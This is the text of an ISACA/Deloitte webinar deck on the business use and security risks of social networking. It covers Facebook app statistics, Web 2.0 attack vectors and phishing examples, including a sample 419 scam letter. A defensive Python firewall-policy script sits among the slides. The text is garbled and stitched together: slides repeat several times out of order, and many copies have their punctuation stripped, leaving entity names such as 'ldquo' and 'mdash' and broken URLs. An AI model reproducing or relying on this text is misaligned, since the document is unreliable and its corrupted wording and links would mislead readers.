  Rank  Name                     Monthly Active Users
     1  FarmVille                        82,580,911
     2  Static FBML                      46,827,021
     3  Birthday Cards                   41,904,049
     4  Café World                       30,032,716
     5  Facebook for iPhone              29,438,848
     6  Texas HoldEm Poker               28,332,917
     7  Slide FunSpace                   25,630,033
     8  Happy Aquarium (BETA)            24,915,971
     9  Mafia Wars                       24,704,179
    10  Causes                           24,317,292

www.isaca.org 36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, and reputation and voting systems are starting to appear, often as plug-ins for social media tools.
• These attacks may also take advantage of URL shortening services (bit.ly, tr.im, tinyurl.com, etc.), which hide the real destination of a link.
Slide 40: Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment
Slide 41: Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment (cont.)
“Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now; I was born on the 1st of January 1986 to the family of Kone. My father’s name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year……”
– See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals.
Slide 42: Risks and challenges (cont.)
• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account.
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized.
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor.
• Intellectual property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium.
Slide 43: Risks and challenges (cont.)
• Failures in the use of social media — most companies that use social media don’t approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren’t fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
“Fully half of all social media investments will fail” — Gartner
Slide 44: Risks and challenges (cont.)
“When I discovered YouTube, I didn't work for five days. I did nothing. I viewed ‘Cookie Monster Sings Chocolate Rain’ about 1000 times.” – Michael Scott, from The Office
• Productivity — Users employ social media tools for nonproductive purposes such as socializing (“Social Notworking”)
http://news.bbc.co.uk/2/hi/business/8325865.stm
Slide 45: Risks and challenges (cont.)
• Technical integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with: Facebook, AOL, Twitter, Blogger, Myspace, WordPress, Yahoo, Netlog, Google, OpenID, Windows Live ID, flickr
Slide 46: Risks and challenges (cont.)
• Information hoarding — In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing.
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom’s law, which states that — “The value of a network equals the net value of each user’s transactions conducted through that network, valued from the perspective of each user and summed for all.”
  Or, alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
Slide 47: Risks and challenges (cont.)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation.
Slide 48: A quick word on privacy
“People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time.”
— Mark Zuckerberg, Facebook founder
“If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place.”
— Eric Schmidt, CEO, Google Inc.
Slide 49: A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence: limited attempt to address it
Slide 50: Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. “termination of employment and legal action”
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Slide 51: Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Slide 52: Responding to the risks and challenges (cont.)
• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
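As an added example (not code from the deck or from any firewall vendor), the following Python script applies the capabilities listed above to constructed proxy log lines: the application is identified from the requested host rather than the port, the user from a constructed IP-to-user directory snapshot rather than from the IP address, and a per-group policy then allows or denies the access. The log format, domains, directory snapshot and policy are all hypothetical.

```python
"""Application-aware policy check over constructed proxy log lines.

Added illustration, not code from the ISACA deck or any firewall vendor.
It mimics three of the next-generation firewall capabilities listed on
the slide: identify the application regardless of port, identify the user
regardless of IP address, and apply policy per application. The log
format, domains, directory snapshot and policy are all constructed.
"""
import re
from collections import Counter

# Host suffix -> application (constructed, not a vendor signature set).
APP_SIGNATURES = {
    "facebook.com": "facebook",
    "fbcdn.net": "facebook",
    "twitter.com": "twitter",
    "myspace.com": "myspace",
    "linkedin.com": "linkedin",
}

# Constructed IP -> (user, group) snapshot, as an authentication log or
# directory agent would supply it; this is what lets policy follow the
# user rather than the address.
USER_MAP = {
    "10.1.4.22": ("alice", "marketing"),
    "10.1.4.23": ("bob", "engineering"),
    "10.1.9.7": ("carol", "finance"),
}

# Per-group allow list of social networking applications (constructed).
POLICY = {
    "marketing": {"facebook", "twitter", "linkedin"},
    "engineering": {"linkedin"},
    "finance": set(),
}

# Constructed log format: timestamp, source IP, method, host:port.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+\.\d+\.\d+\.\d+) (?P<method>\w+) "
    r"(?P<host>[\w.-]+):(?P<port>\d+)$"
)


def classify_app(host: str) -> str:
    """Map a host to an application by domain suffix; unknown hosts -> 'other'."""
    host = host.lower().rstrip(".")
    for suffix, app in APP_SIGNATURES.items():
        if host == suffix or host.endswith("." + suffix):
            return app
    return "other"


def evaluate(line: str) -> dict:
    """Parse one log line and decide allow/deny for it."""
    m = LOG_RE.match(line.strip())
    if not m:
        return {"error": "unparsed", "line": line}
    app = classify_app(m["host"])  # the port is deliberately ignored
    user, group = USER_MAP.get(m["src"], ("unknown", "unknown"))
    if app == "other":
        decision = "allow"  # not a social networking app: outside this policy
    elif app in POLICY.get(group, set()):
        decision = "allow"
    else:
        decision = "deny"  # includes users the directory cannot identify
    return {"user": user, "group": group, "app": app,
            "port": int(m["port"]), "decision": decision}


def summarize(lines) -> Counter:
    """Count (user, app, decision) triples for an audit report."""
    counts = Counter()
    for line in lines:
        r = evaluate(line)
        if "error" not in r:
            counts[(r["user"], r["app"], r["decision"])] += 1
    return counts


# Constructed proxy log lines.
SAMPLE_LOG = [
    "2010-03-15T09:01:12Z 10.1.4.22 CONNECT www.facebook.com:443",
    "2010-03-15T09:01:15Z 10.1.4.23 GET apps.facebook.com:80",
    "2010-03-15T09:02:40Z 10.1.4.23 CONNECT twitter.com:8443",  # unusual port
    "2010-03-15T09:03:05Z 10.1.9.7 GET www.linkedin.com:80",
    "2010-03-15T09:03:09Z 10.1.9.7 GET intranet.example.local:80",
    "2010-03-15T09:04:00Z 10.1.7.1 GET static.ak.fbcdn.net:80",  # unmapped IP
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(evaluate(line))
    print(summarize(SAMPLE_LOG))
```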
Slide 53: What is next in the world of social networking
Slide 54: Where we are at today
• Enterprise social media has crossed the tipping point and is no longer considered an “emerging” technology
“The Hype Cycle” — http://en.wikipedia.org/wiki/Hype_cycle
Slide 55: What’s next in the world of social networking
• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car’s navigation system will be able to learn your friend’s location and provide directions to them
Slide 56: Some further predictions
• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… Something important that has the potential to change the world, though we have a long way to go” — Biz Stone, Co-founder of Twitter
Slide 57: Q&A
Slide 58: Today’s Presenters
Nelson Gibbs, Senior Manager, AERS – Audit & Enterprise Risk Services, Deloitte & Touche LLP, ngibbs@deloitte.com, +1 213 593 4241
Slide 59: Appendix
• Additional resources
  – Gopal, Raj et al., “Web 2.0 reinvents corporate networking”, Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, “January 30, 2010”
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Great Wall of Facebook: The Social Network’s Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009) — http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
Slide 60
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
Slide 30: Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
Slide 31: Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
Slide 32: Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
Slide 33: Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
Slide 34: Risks and challenges
Slide 35: Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications
    • Source – http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                    Monthly Active Users
  1   FarmVille                         82,580,911
  2   Static FBML                       46,827,021
  3   Birthday Cards                    41,904,049
  4   Café World                        30,032,716
  5   Facebook for iPhone               29,438,848
  6   Texas HoldEm Poker                28,332,917
  7   Slide FunSpace                    25,630,033
  8   Happy Aquarium (BETA)             24,915,971
  9   Mafia Wars                        24,704,179
 10   Causes                            24,317,292
Slide 36: Risks and challenges (cont.)
• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML (“AJAX”) and Rich Internet Application (“RIA”) clients that are enhancing client-end interfaces in the browser itself
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
Slide 32: Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
Slide 33: Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
Slide 34: Risks and challenges
Slide 35: Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications
    • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                    Monthly Active Users
1     FarmVille               82,580,911
2     Static FBML             46,827,021
3     Birthday Cards          41,904,049
4     Café World              30,032,716
5     Facebook for iPhone     29,438,848
6     Texas HoldEm Poker      28,332,917
7     Slide FunSpace          25,630,033
8     Happy Aquarium (BETA)   24,915,971
9     Mafia Wars              24,704,179
10    Causes                  24,317,292
Slide 36: Risks and challenges (cont.)
• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML (“AJAX”) and Rich Internet Application (“RIA”) clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting (“CSS”) in AJAX, e.g. “Samy worm that exploited MySpace.com’s CSS flaw”
  – XML poisoning — poison XML blocks coming from AJAX client
